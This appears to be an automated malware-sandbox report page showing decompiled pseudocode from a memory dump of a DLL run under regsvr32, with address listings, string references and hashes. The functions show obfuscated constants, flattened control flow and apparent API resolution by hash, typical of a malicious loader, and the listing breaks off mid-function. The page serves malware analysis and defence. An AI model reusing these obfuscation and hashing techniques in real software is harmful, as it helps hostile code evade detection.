					_t111 = 0xaa4f6fe7;
					L5:
					asm("outsd");
					asm("stosb");
					asm("lock imul edi, [ecx-0x43], 0xffffff9f");
					_t124 = 0x2fb5a6ea;
					_t142 =  *0xFFFFFFFFAA4F7037 & 0x00000049;
					_pop(_t136);
					asm("rol byte [edx-0x20aa703], 1");
					L6:
					_pop(ss);
					asm("arpl [esi-0x56ee98a9], sp");
					if(_t142 >= 0) {
						L7:
						_t110 = 0xaa4f6fe7 |  *(__esi + 0x7d);
						asm("insb");
						if(_t110 <= 0) {
							L1:
							 *__eax =  *__eax + __eax;
							 *__eax =  *__eax + __eax;
							_t104 = __eax & 0x000000a8;
							_t134 = _t131 ^  *(_t104 - 0x24fed9c5);
							asm("a16 push esp");
							_t117 = __ecx + 1;
							asm("iretd");
							L2:
							_t105 = _t104 - 1;
							_push(_t105);
							_push(__esi);
							asm("wait");
							 *_t105 =  *_t105 | _t117;
							_t118 = _t117 + 1;
							asm("rcr byte [esi+0x6], 1");
							asm("sbb eax, [ecx+eax]");
							L3:
							asm("fistp dword [ecx]");
							asm("int1");
							_t132 = _t134;
							_t92 =  *( &(_t105[0]) - 0x4d4b858d) * 0xffffffdb;
							_pop(ds);
							_t119 = 0x8500a362;
							_t116 =  *((intOrPtr*)(_t118 + 0x14));
							 *_t92 =  *_t92 + _t92;
							 *_t92 =  *_t92 + _t92;
							 *_t92 =  *_t92 + _t92;
							 *_t92 =  *_t92 + _t92;
							asm("iretd");
							asm("sbb byte [0x1d82de1c], 0x1c");
							continue;
						} else {
							L8:
							L9:
							_t136 = _t136 - 0x28;
							_v20 = 0x5e1dcd;
							_t119 = 0xc2b5b2c;
							_v20 = _v20 ^ 0xc5450da8;
							_t90 = _v20 * 0x68;
							_push(_t110);
							break;
						}
					}
					L11:
					_t137 = _t136 + 1;
					_a5 = _a5 << 0x10;
					_a5 = _a5 * 0x50;
					_a5 = _a5 ^ 0x580a3982;
					_a33 = 0x5e934b;
					_a33 = _a33 | 0x2f5aadd8;
					_a33 = _a33 ^ 0x2f596fc5;
					_a9 = 0xc2fac6;
					_a9 = _a9 << 3;
					_a9 = _a9 ^ 0x5dec7d11;
					_a9 = _a9 ^ 0x5a4b124a;
					_a9 = _a9 ^ 0x01bb61ed;
					_a41 = 0x54addb;
					_a41 = _a41 ^ 0x190194c7;
					_a41 = _a41 ^ 0x195f8313;
					_a21 = 0x3d3631;
					_t52 =  &_a21; // 0x3d3631
					_t129 = _a41;
					_a21 =  *_t52 * 0x28;
					_t55 =  &_a21; // 0x3d3631
					_a21 =  *_t55 * 0x36;
					_a21 = _a21 ^ 0x0478891a;
					_a29 = 0x953a09;
					_a29 = _a29 + 0xffffdf30;
					_a29 = _a29 >> 7;
					_a29 = _a29 ^ 0x00004a6a;
					_a25 = 0x144caa;
					_a25 = _a25 + 0xfaf0;
					_a25 = _a25 ^ 0x5acd916f;
					_a25 = _a25 ^ 0x5adb44b3;
					_a13 = 0x94ed39;
					_a13 = _a13 | 0xfffbfdfb;
					_a13 = _a13 ^ 0xfff0fb9b;
					do {
						L12:
						while(_t119 != _t132) {
							if(_t119 == 0x554d29f) {
								L18:
								_t116 = _t124 + 0x28;
								_t98 = E1000D532(_t116, _a9, _a41, _a21);
								_t137 = _t137 + 8;
								_t119 = _t132;
								_t129 = _t129 + _t98;
								continue;
							} else {
								L14:
								if(_t119 == _t111) {
									L17:
									_push(_t116);
									_push(_t116);
									_t102 = E10015958();
									_t137 = _t137 + 8;
									_t119 = 0x554d29f;
									_t129 = _t129 + _t102;
									continue;
								} else {
									L15:
									if(_t119 == 0xc2b5b2c) {
										L16:
										_t129 = _a17;
										_t119 = _t111;
										continue;
									}
								}
							}
							goto L20;
						}
						_t116 = _t124 + 0x38;
						_t97 = E1000D532(_t116, _a29, _a25, _a13);
						_t137 = _t137 + 8;
						_t119 = 0xcb59ab7;
						_t129 = _t129 + _t97;
						__eflags = _t129;
						L20:
						__eflags = _t119 - 0xcb59ab7;
					} while (_t119 != 0xcb59ab7);
					return _t129;
					L22:
				}
				L10:
				_push(_t131);
				_a16 = _t90;
				_t124 = _t115;
				_a16 = _a16 ^ 0x12fea908;
				_t132 = 0x2a0700f;
				_a36 = 0x2c896c;
				_t111 = 0xa3bf378;
				_a36 = _a36 * 0x75;
				_a36 = _a36 ^ 0x145380e5;
				_a4 = 0xedaa94;
				_t92 = _a4 * 0x60;
				_a4 = _a4 * 0x60;
				goto L11;
			}

0x100018f6
0x100018f6
0x100018f6
0x100018f6
0x100018f6
0x100018f6
0x100018f6
0x100018f6
0x100018fb
0x100018fd
0x100018fe
0x00000000
0x00000000
0x10001900
0x10001900
0x10001901
0x10001903
0x10001904
0x10001906
0x10001906
0x10001908
0x10001909
0x1000190e
0x10001913
0x10001917
0x10001918
0x1000191e
0x1000191e
0x1000191f
0x10001925
0x10001927
0x10001927
0x1000192a
0x1000192b
0x100018b0
0x100018b0
0x100018b2
0x100018b4
0x100018b8
0x100018be
0x100018c0
0x100018c1
0x100018c2
0x100018c2
0x100018c3
0x100018c4
0x100018c5
0x100018c6
0x100018c8
0x100018c9
0x100018ce
0x100018cf
0x100018d1
0x100018d4
0x100018d5
0x100018d6
0x100018e1
0x100018e3
0x100018e8
0x100018ec
0x100018ee
0x100018f0
0x100018f2
0x100018f4
0x100018f5
0x00000000
0x1000192d
0x1000192d
0x10001930
0x10001930
0x10001933
0x1000193b
0x10001940
0x10001948
0x1000194d
0x00000000
0x1000194d
0x1000192b
0x10001990
0x10001990
0x10001993
0x1000199d
0x100019a1
0x100019a9
0x100019b1
0x100019b9
0x100019c1
0x100019c9
0x100019ce
0x100019d6
0x100019de
0x100019e6
0x100019ee
0x100019f6
0x100019fe
0x10001a06
0x10001a0b
0x10001a0f
0x10001a13
0x10001a18
0x10001a1c
0x10001a24
0x10001a2c
0x10001a34
0x10001a39
0x10001a41
0x10001a49
0x10001a51
0x10001a59
0x10001a61
0x10001a69
0x10001a71
0x10001a79
0x00000000
0x10001a79
0x10001a83
0x10001ab8
0x10001abc
0x10001ac7
0x10001acc
0x10001acf
0x10001ad1
0x00000000
0x10001a85
0x10001a85
0x10001a87
0x10001a99
0x10001aa5
0x10001aa6
0x10001aa7
0x10001aac
0x10001aaf
0x10001ab4
0x00000000
0x10001a89
0x10001a89
0x10001a8f
0x10001a91
0x10001a91
0x10001a95
0x00000000
0x10001a95
0x10001a8f
0x10001a87
0x00000000
0x10001a83
0x10001ad9
0x10001ae4
0x10001ae9
0x10001aec
0x10001af1
0x10001af1
0x10001af3
0x10001af3
0x10001af3
0x10001b08
0x00000000
0x10001b08
0x1000194e
0x1000194e
0x10001951
0x10001955
0x10001957
0x1000195f
0x10001964
0x1000196c
0x10001976
0x1000197a
0x10001982
0x1000198a
0x1000198f
0x00000000

Strings

16=, xrefs: 100019FE
16=, xrefs: 10001A06, 10001A13
jJ, xrefs: 10001A39

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 16=$16=$jJ
API String ID: 0-3388153798
Opcode ID: 58be6027aa6f78d49d21770af5bc380d1f5a7195e27374a108a60940a1c2edfd
Instruction ID: d7cb8c56cfc26b8ced2c2549ecad9115d8fe7f5f5f2be22766b9a82e466f3968
Opcode Fuzzy Hash: 58be6027aa6f78d49d21770af5bc380d1f5a7195e27374a108a60940a1c2edfd
Instruction Fuzzy Hash: CF4144715093828BD348CF25828644BFFE0FB95798F545E1DE4DAAA264C374DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1000B200 Relevance: 3.8, Strings: 3, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E1000B200(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t80;
				signed int _t97;
				signed int _t98;
				signed int _t108;
				signed int _t109;

				_push(_a12);
				_t108 = _a8;
				_push(_t108);
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t80);
				_v24 = 0xc0dd2b;
				_v24 = _v24 ^ 0xcab0e7e3;
				_v24 = _v24 ^ 0xca7aed82;
				_v28 = 0x7830d0;
				_t97 = 0x29;
				_v28 = _v28 / _t97;
				_v28 = _v28 ^ 0x00095dca;
				_v16 = 0x1d20c0;
				_v16 = _v16 + 0xfffffde6;
				_t98 = 0x31;
				_v16 = _v16 / _t98;
				_v16 = _v16 ^ 0x000920e4;
				_v12 = 0x9992f2;
				_v12 = _v12 ^ 0xd65e9417;
				_v12 = _v12 + 0xffffed46;
				_v12 = _v12 ^ 0xd6cea1cd;
				_v8 = 0x69a199;
				_v8 = _v8 << 6;
				_v8 = _v8 + 0xffff544f;
				_v8 = _v8 ^ 0x1a697119;
				_a8 = 0xadc2b8;
				_a8 = _a8 >> 0xc;
				_a8 = _a8 + 0xffff52f1;
				_a8 = _a8 + 0xffff2b59;
				_a8 = _a8 ^ 0xfff5450c;
				_v20 = 0xdf123e;
				_v20 = _v20 + 0x7c6a;
				_v20 = _v20 + 0xffff96b1;
				_v20 = _v20 ^ 0x00dcf793;
				E1000F2B9();
				_v24 = 0x571c35;
				_v24 = _v24 * 0x53;
				_v24 = _v24 ^ 0x1c3e252b;
				_v32 = 0x525f11;
				_v32 = _v32 ^ 0x9d415f21;
				_v32 = _v32 ^ 0x9d130020;
				_t109 = E1000D763(_v32, _v24);
				_push(_t109);
				_push(_v20);
				_push(_t108);
				E1001DF4E(1, _a8);
				 *((short*)(_t108 + _t109 * 2)) = 0;
				return 0;
			}

0x1000b208
0x1000b20b
0x1000b20e
0x1000b20f
0x1000b213
0x1000b214
0x1000b219
0x1000b223
0x1000b22c
0x1000b233
0x1000b23f
0x1000b244
0x1000b249
0x1000b250
0x1000b257
0x1000b261
0x1000b264
0x1000b267
0x1000b26e
0x1000b275
0x1000b27c
0x1000b283
0x1000b28a
0x1000b291
0x1000b295
0x1000b29c
0x1000b2a3
0x1000b2aa
0x1000b2ae
0x1000b2b5
0x1000b2bc
0x1000b2c3
0x1000b2ca
0x1000b2d1
0x1000b2d8
0x1000b2e2
0x1000b2e7
0x1000b2f2
0x1000b2f5
0x1000b2fc
0x1000b303
0x1000b30a
0x1000b32b
0x1000b32f
0x1000b330
0x1000b337
0x1000b338
0x1000b342
0x1000b34b

Strings

j|, xrefs: 1000B2CA
, xrefs: 1000B267
, xrefs: 1000B30A

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $j|$
API String ID: 0-1264518786
Opcode ID: 06e32dd75037c6f46c71b96f19c7dab06160d68b4d96adf32541fedc77d430ea
Instruction ID: 4a3c2548feae9a0929c3e500ba21cf90f063ce482e210cc162006863e4b3e2d8
Opcode Fuzzy Hash: 06e32dd75037c6f46c71b96f19c7dab06160d68b4d96adf32541fedc77d430ea
Instruction Fuzzy Hash: BA3114B6D0030AABCB44DFE5D94A8AEBBB1FB50314F108149E516AA261E3B45B15CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1000F43B Relevance: 3.8, Strings: 3, Instructions: 53
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1000F43B(void* __ecx, void* __edx) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _t50;
				signed int _t53;
				void* _t58;
				void* _t59;

				_v20 = 0x7948c2;
				_v20 = _v20 + 0xf093;
				_v20 = _v20 + 0x368;
				_v20 = _v20 ^ 0x0071a5a6;
				_v16 = 0xc2b6db;
				_v16 = _v16 ^ 0x6bc9080f;
				_t59 = __edx;
				_t58 = __ecx;
				_v16 = _v16 * 0x7c;
				_v16 = _v16 | 0x3f6d437e;
				_v16 = _v16 ^ 0xfff1350a;
				_v12 = 0xeaeb2c;
				_v12 = _v12 ^ 0xeb73f5c8;
				_t53 = 0xc;
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0xb0496578;
				_v12 = _v12 ^ 0xa3ee616b;
				_v8 = 0x1bffeb;
				_v8 = _v8 ^ 0xbe7a9693;
				_v8 = _v8 ^ 0xf477ea3f;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x004d325e;
				_t50 = E1001BFF0(0xac802c42, 0xde, _t53, _t53, 0x38126266);
				return  *_t50(_t58, 0, _t59, _t53);
			}

0x1000f441
0x1000f448
0x1000f44f
0x1000f456
0x1000f45d
0x1000f464
0x1000f473
0x1000f475
0x1000f477
0x1000f47c
0x1000f483
0x1000f48a
0x1000f491
0x1000f49b
0x1000f49f
0x1000f4a2
0x1000f4a9
0x1000f4b0
0x1000f4b7
0x1000f4be
0x1000f4c5
0x1000f4c9
0x1000f4ed
0x1000f500

Strings

,, xrefs: 1000F48A
~Cm?, xrefs: 1000F47C
^2M, xrefs: 1000F4C9

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$^2M$~Cm?
API String ID: 0-2938175009
Opcode ID: 38c12b96d2ad5b27228d2cdad687c38c4f90fa50f78f3da320ed87943f964933
Instruction ID: 00e4971ed5c8897bf189d4ed99b2ad356af6992ca73faf8d82ffefda95d060af
Opcode Fuzzy Hash: 38c12b96d2ad5b27228d2cdad687c38c4f90fa50f78f3da320ed87943f964933
Instruction Fuzzy Hash: BF119431D10218FFDB18DFE9D90A9EEBBB4EB80300F20819DE525B6250E3B45B018FA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002225A Relevance: 2.7, Strings: 2, Instructions: 249
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1002225A() {
				intOrPtr _t228;
				intOrPtr _t229;
				signed char _t242;
				intOrPtr _t249;
				signed int _t252;
				signed char _t261;
				void* _t264;
				intOrPtr* _t272;
				intOrPtr _t285;
				signed int _t286;
				signed int _t287;
				intOrPtr _t289;
				void* _t290;

				 *(_t290 + 0x74) = 0x802c30;
				 *(_t290 + 0x74) =  *(_t290 + 0x74) ^ 0xd24b4fa4;
				_t252 = 0x5f150d4;
				 *(_t290 + 0x74) =  *(_t290 + 0x74) ^ 0xd2cb6394;
				 *(_t290 + 0x34) = 0xda1fdc;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) + 0xffff6a0c;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xae0417a6;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xaed2ede2;
				 *(_t290 + 0x30) = 0x14c272;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) + 0xffff1178;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) << 8;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0x13d09fb8;
				 *(_t290 + 0x2c) = 0x412fde;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) + 0xffff96be;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) | 0x99233293;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x996c99d3;
				 *(_t290 + 0x28) = 0x504eaf;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0xffff9366;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) | 0x5abcc6a8;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x5aff5fff;
				 *(_t290 + 0x54) = 0x87d62f;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) << 0xa;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1f5bb100;
				 *(_t290 + 0x50) = 0x684a00;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa36d;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x006d85c6;
				 *(_t290 + 0x3c) = 0x777684;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) << 7;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) << 7;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0xdda2ffb6;
				 *(_t290 + 0x38) = 0xf9703f;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 1;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) * 0x3f;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x7ac92bd8;
				 *(_t290 + 0x14) = 0x7d714c;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) + 0xab1b;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) + 0x375c;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) + 0xffffa63d;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x007cc2d1;
				 *(_t290 + 0x58) = 0x5888ee;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xffffbcf3;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x0053f973;
				 *(_t290 + 0x60) = 0x7771b0;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0xffffe8de;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0x0070d2a1;
				 *(_t290 + 0x1c) = 0x4387b9;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfce9965a;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) + 0xbaa0;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) | 0x360ae689;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfeadf8f2;
				 *(_t290 + 0x48) = 0x54801c;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 4;
				_t286 = 7;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) * 0x3e;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x01472f59;
				 *(_t290 + 0x18) = 0x2c6db8;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0xe4857aba;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) << 0xf;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 1;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x45c225f9;
				 *(_t290 + 0x44) = 0x462ca4;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) + 0xb3b1;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) + 0xffffcce1;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0x00414ba9;
				 *(_t290 + 0x40) = 0x76e3b9;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 1;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) | 0x9a2ae6a8;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x9aee6ec3;
				 *(_t290 + 0x5c) = 0x1ea89c;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) / _t286;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x000b931c;
				 *(_t290 + 0x24) = 0x87ebcb;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) + 0xffffcc1a;
				_t287 = 0x66;
				_t285 =  *((intOrPtr*)(_t290 + 0x7c));
				_t289 =  *((intOrPtr*)(_t290 + 0x7c));
				 *(_t290 + 0x24) =  *(_t290 + 0x24) * 0x52;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) * 0x38;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x827f4788;
				 *(_t290 + 0x20) = 0x6cbf5;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x77;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) | 0x47aeb58d;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) + 0xffffd403;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x47a133b5;
				 *(_t290 + 0x4c) = 0xb2c663;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xce108c96;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) / _t287;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0202fae3;
				_t228 =  *((intOrPtr*)(_t290 + 0x68));
				 *(_t290 + 0x70) = 0xe0429c;
				 *(_t290 + 0x70) =  *(_t290 + 0x70) | 0x6d37d55d;
				 *(_t290 + 0x70) =  *(_t290 + 0x70) ^ 0x6df57308;
				 *(_t290 + 0x6c) = 0x7d75d3;
				 *(_t290 + 0x6c) =  *(_t290 + 0x6c) + 0xffff6428;
				 *(_t290 + 0x6c) =  *(_t290 + 0x6c) ^ 0x0071fd5c;
				while(1) {
					L1:
					_t272 =  *((intOrPtr*)(_t290 + 0x64));
					L2:
					while(1) {
						while(_t252 != 0x7f8b24) {
							if(_t252 == 0x2fd4739) {
								_push( *(_t290 + 0x58));
								_push( *(_t290 + 0x18));
								_push( *(_t290 + 0x40));
								 *(_t290 + 0x1e) =  *((intOrPtr*)(_t285 + 2));
								 *((char*)(_t290 + 0x1f)) =  *((intOrPtr*)(_t285 + 3));
								E1000C453( *(_t290 + 0x58),  *((intOrPtr*)(_t290 + 0x80)),  *(_t290 + 0x43) & 0x000000ff,  *(_t290 + 0x48),  *(_t290 + 0x70),  *(_t290 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t290 + 0x64)), _t289 + 0x10,  *(_t285 + 1) & 0x000000ff, 0x10, E10004BB4(0x10001084,  *(_t290 + 0x48)),  *(_t290 + 0x6c),  *(_t285 + 1) & 0x000000ff);
								E1000B9D7( *((intOrPtr*)(_t290 + 0x64)),  *(_t290 + 0x60), _t236,  *((intOrPtr*)(_t290 + 0x88)));
								_t290 = _t290 + 0x44;
								 *(_t289 + 0x42) = ( *(_t285 + 4) & 0x000000ff) << 0x00000008 |  *(_t285 + 5) & 0x000000ff;
								_t242 =  *((intOrPtr*)(_t285 + 6));
								_t261 =  *((intOrPtr*)(_t285 + 7));
								_t285 = _t285 + 8;
								_t252 = 0x7f8b24;
								 *(_t289 + 0x40) = (_t242 & 0x000000ff) << 0x00000008 | _t261 & 0x000000ff;
								goto L13;
							} else {
								if(_t252 == 0x5f150d4) {
									_t252 = 0xdeac2e1;
									_t272 =  *0x10025088 + 0x24;
									 *((intOrPtr*)(_t290 + 0x64)) = _t272;
									goto L14;
								} else {
									if(_t252 == 0x8513850) {
										E10006A8D( *(_t290 + 0x74),  *(_t290 + 0x6c),  *((intOrPtr*)(_t290 + 0x7c)));
									} else {
										if(_t252 == 0x909989e) {
											_push(_t252);
											_t264 = 0x50;
											_t289 = E1001EAA3(_t264);
											__eflags = _t289;
											if(__eflags != 0) {
												_t252 = 0x2fd4739;
												L13:
												_t272 =  *((intOrPtr*)(_t290 + 0x64));
												goto L14;
											}
										} else {
											if(_t252 == 0xc13acd3) {
												__eflags = _t285 - _t228;
												asm("sbb ecx, ecx");
												_t252 = (_t252 & 0x00b8604e) + 0x8513850;
												continue;
											} else {
												_t298 = _t252 - 0xdeac2e1;
												if(_t252 != 0xdeac2e1) {
													L18:
													__eflags = _t252 - 0x46ba081;
													if(__eflags != 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t290 + 0x68));
														continue;
													}
												} else {
													_t249 = E1001ACFF( *(_t290 + 0x44),  *(_t290 + 0x40), _t298,  *(_t290 + 0x38),  *(_t290 + 0x30), 0x10024000, _t290 + 0x78);
													_t290 = _t290 + 0x10;
													 *((intOrPtr*)(_t290 + 0x7c)) = _t249;
													_t285 = _t249;
													_t252 = 0x909989e;
													_t228 = _t249 +  *((intOrPtr*)(_t290 + 0x78));
													 *((intOrPtr*)(_t290 + 0x68)) = _t228;
													goto L1;
												}
											}
										}
									}
								}
							}
							 *((intOrPtr*)( *0x10025088 + 0x10)) =  *((intOrPtr*)( *0x10025088 + 0x24));
							 *((intOrPtr*)( *0x10025088)) =  *((intOrPtr*)(_t290 + 0x68));
							__eflags = 1;
							return 1;
						}
						_t229 =  *0x10025088;
						_t252 = 0xc13acd3;
						 *_t272 = _t289;
						_t272 = _t289 + 0x30;
						 *((intOrPtr*)(_t290 + 0x64)) = _t272;
						_t211 = _t229 + 0x18;
						 *_t211 =  *((intOrPtr*)(_t229 + 0x18)) + 1;
						__eflags =  *_t211;
						goto L18;
					}
				}
			}

0x10022261
0x1002226b
0x10022273
0x10022278
0x10022280
0x10022288
0x10022290
0x10022298
0x100222a0
0x100222a8
0x100222b0
0x100222b5
0x100222bd
0x100222c5
0x100222cd
0x100222d5
0x100222dd
0x100222e5
0x100222ed
0x100222f5
0x100222fd
0x10022305
0x1002230a
0x10022312
0x1002231a
0x10022322
0x1002232a
0x10022332
0x10022337
0x1002233c
0x10022344
0x1002234c
0x10022355
0x10022359
0x10022361
0x10022369
0x10022371
0x10022379
0x10022381
0x10022389
0x10022391
0x10022399
0x100223a1
0x100223a9
0x100223b1
0x100223b9
0x100223c1
0x100223c9
0x100223d1
0x100223d9
0x100223e1
0x100223e9
0x100223f5
0x100223f6
0x100223fa
0x10022402
0x1002240a
0x10022412
0x10022417
0x1002241b
0x10022423
0x1002242b
0x10022433
0x1002243b
0x10022443
0x1002244b
0x1002244f
0x10022457
0x1002245f
0x1002246d
0x10022471
0x10022479
0x10022483
0x10022492
0x10022493
0x10022497
0x1002249b
0x100224a4
0x100224a8
0x100224b0
0x100224bd
0x100224c1
0x100224c9
0x100224d1
0x100224d9
0x100224e1
0x100224ef
0x100224f3
0x100224fb
0x100224ff
0x10022507
0x1002250f
0x10022517
0x1002251f
0x10022527
0x1002252f
0x1002252f
0x1002252f
0x00000000
0x10022533
0x10022533
0x10022545
0x10022610
0x1002261c
0x10022622
0x1002262d
0x10022634
0x1002267c
0x10022691
0x1002269a
0x100226a8
0x100226ac
0x100226af
0x100226b2
0x100226bb
0x100226c7
0x00000000
0x1002254b
0x10022551
0x10022602
0x10022607
0x1002260a
0x00000000
0x10022557
0x1002255d
0x100226ff
0x10022563
0x10022569
0x100225d6
0x100225d9
0x100225df
0x100225e2
0x100225e4
0x100225ea
0x100225ef
0x100225ef
0x00000000
0x100225ef
0x1002256b
0x10022571
0x100225b9
0x100225bb
0x100225c3
0x00000000
0x10022573
0x10022573
0x10022579
0x100226e6
0x100226e6
0x100226ec
0x100225f3
0x100225f3
0x00000000
0x100225f3
0x1002257f
0x10022599
0x1002259e
0x100225a1
0x100225a5
0x100225a7
0x100225ac
0x100225b0
0x00000000
0x100225b0
0x10022579
0x10022571
0x10022569
0x1002255d
0x10022551
0x10022711
0x1002271e
0x10022722
0x10022726
0x10022726
0x100226d0
0x100226d5
0x100226da
0x100226dc
0x100226df
0x100226e3
0x100226e3
0x100226e3
0x00000000
0x100226e3
0x10022533

Strings

Lq}, xrefs: 10022361
\7, xrefs: 10022371

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Lq}$\7
API String ID: 0-88638433
Opcode ID: 5d4bd0b9a276f93f015de4288988e5813476fb46e263df6c61baf4d05d5c33f0
Instruction ID: 2657c918a60f40db388ad5bb4d984ecaac7eb36aea57897dc32a2e5eeb70b3b1
Opcode Fuzzy Hash: 5d4bd0b9a276f93f015de4288988e5813476fb46e263df6c61baf4d05d5c33f0
Instruction Fuzzy Hash: 7DC150B14083819FC368CF65C58981BBBF1FBC5358F608A1DF6A696260D3B4D949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1001DAD8 Relevance: 2.7, Strings: 2, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E1001DAD8() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _t191;
				short _t194;
				short _t201;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t210;
				intOrPtr _t227;
				void* _t228;
				void* _t229;
				short* _t230;
				short* _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				void* _t238;

				_v76 = _v76 & 0x00000000;
				_v88 = 0xba6101;
				_t205 = 0x5670c69;
				_v84 = 0xe2fc1f;
				_v80 = 0x17ea5;
				_t227 =  *0x10024208; // 0x49d848
				_v8 = 0xed8134;
